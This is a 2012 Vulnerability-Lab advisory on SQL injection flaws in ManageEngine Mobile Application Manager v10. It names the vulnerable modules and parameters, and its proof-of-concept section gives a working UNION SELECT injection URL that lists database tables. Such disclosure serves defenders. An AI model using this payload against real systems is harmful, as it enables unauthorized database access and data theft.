142 lines
5.3 KiB
Text
Executable file
142 lines
5.3 KiB
Text
Executable file
Title:
|
|
======
|
|
ME Mobile Application Manager v10 - SQL Vulnerabilities
|
|
|
|
|
|
Date:
|
|
=====
|
|
2012-07-04
|
|
|
|
|
|
References:
|
|
===========
|
|
http://www.vulnerability-lab.com/get_content.php?id=628
|
|
|
|
|
|
VL-ID:
|
|
=====
|
|
628
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
8.1
|
|
|
|
|
|
Introduction:
|
|
=============
|
|
ManageEngine Mobile Applications Manager is a server and application performance monitoring software that helps businesses
|
|
ensure high availability and performance for their business applications by ensuring servers and applications have
|
|
high uptime. The application performance management capability includes server monitoring, application server
|
|
monitoring, database monitoring, web services monitoring, virtualization monitoring, cloud monitoring and an array of
|
|
other application management capability that will help IT administrators manage their resources effectively.
|
|
|
|
Note: The mobile version 10 is compatible with Blackberry, Iphone & Android smartphones with IE, Safari or Firefox browser.
|
|
|
|
(Copy of the Vendor Homepage: http://www.manageengine.com/products/applications_manager )
|
|
|
|
|
|
Abstract:
|
|
=========
|
|
The Vulnerability Laboratory Research Team discovered multiple SQL Injection Vulnerabilities in Manage Engines Mobile Application Manager v10.
|
|
|
|
|
|
Report-Timeline:
|
|
================
|
|
2012-06-23: Public or Non-Public Disclosure
|
|
|
|
|
|
Status:
|
|
========
|
|
Published
|
|
|
|
|
|
Affected Products:
|
|
==================
|
|
Manage Engine
|
|
Product: Mobile Application Manager v10.0
|
|
|
|
|
|
Exploitation-Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity:
|
|
=========
|
|
Critical
|
|
|
|
|
|
Details:
|
|
========
|
|
Multiple SQL Injection vulnerabilities are detected in Manage Engines Mobile Application Manager v10.
|
|
The vulnerability allows an attacker (remote) or local low privileged user account to inject/execute own sql commands
|
|
on the affected application dbms without user inter action. The vulnerabilities are located in the DetailsView.do or Search.do
|
|
module(s) and the bound vulnerable parameters showMGDetails&groupId & viewName. Successful exploitation of the vulnerabilities
|
|
result in dbms & application compromise via sql injection attack.
|
|
|
|
Vulnerable Module(s):
|
|
[+] DetailsView.do
|
|
[+] Search.do
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] showMGDetails&groupId
|
|
[+] viewName
|
|
|
|
|
|
Proof of Concept:
|
|
=================
|
|
The sql injection vulnerabilities in the mobile manager application can be exploited by remote attackers without user inter action.
|
|
For demonstration or reproduce ...
|
|
|
|
PoC:
|
|
http://appmanager.127.0.0.1:1339/mobile/DetailsView.do?method=showMGDetails&groupId=10003645+UnION+
|
|
SelEct+group_concat(table_NAME),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+
|
|
WHERE+table_schema=database()--%20-
|
|
|
|
http://appmanager.127.0.0.1:1339/mobile/Search.do?method=mobileSearch
|
|
&requestid=[SQL INJECTION]mobileSearchPage&viewName=Search
|
|
|
|
|
|
Risk:
|
|
=====
|
|
The security risk of the sql injection vulnerabilities are estimated as high.
|
|
|
|
|
|
Credits:
|
|
========
|
|
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed [storm] (strom@vulnerability-lab.com)
|
|
|
|
|
|
Disclaimer:
|
|
===========
|
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
|
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
|
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
|
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
|
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
|
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
|
or trade with fraud/stolen material.
|
|
|
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
|
|
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
|
|
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
|
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
|
|
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
|
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
|
|
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
|
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
|
|
|
|
Copyright ? 2012 | Vulnerability Laboratory
|
|
|
|
|
|
|
|
--
|
|
VULNERABILITY RESEARCH LABORATORY
|
|
LABORATORY RESEARCH TEAM
|
|
CONTACT: research@vulnerability-lab.com
|
|
|
|
|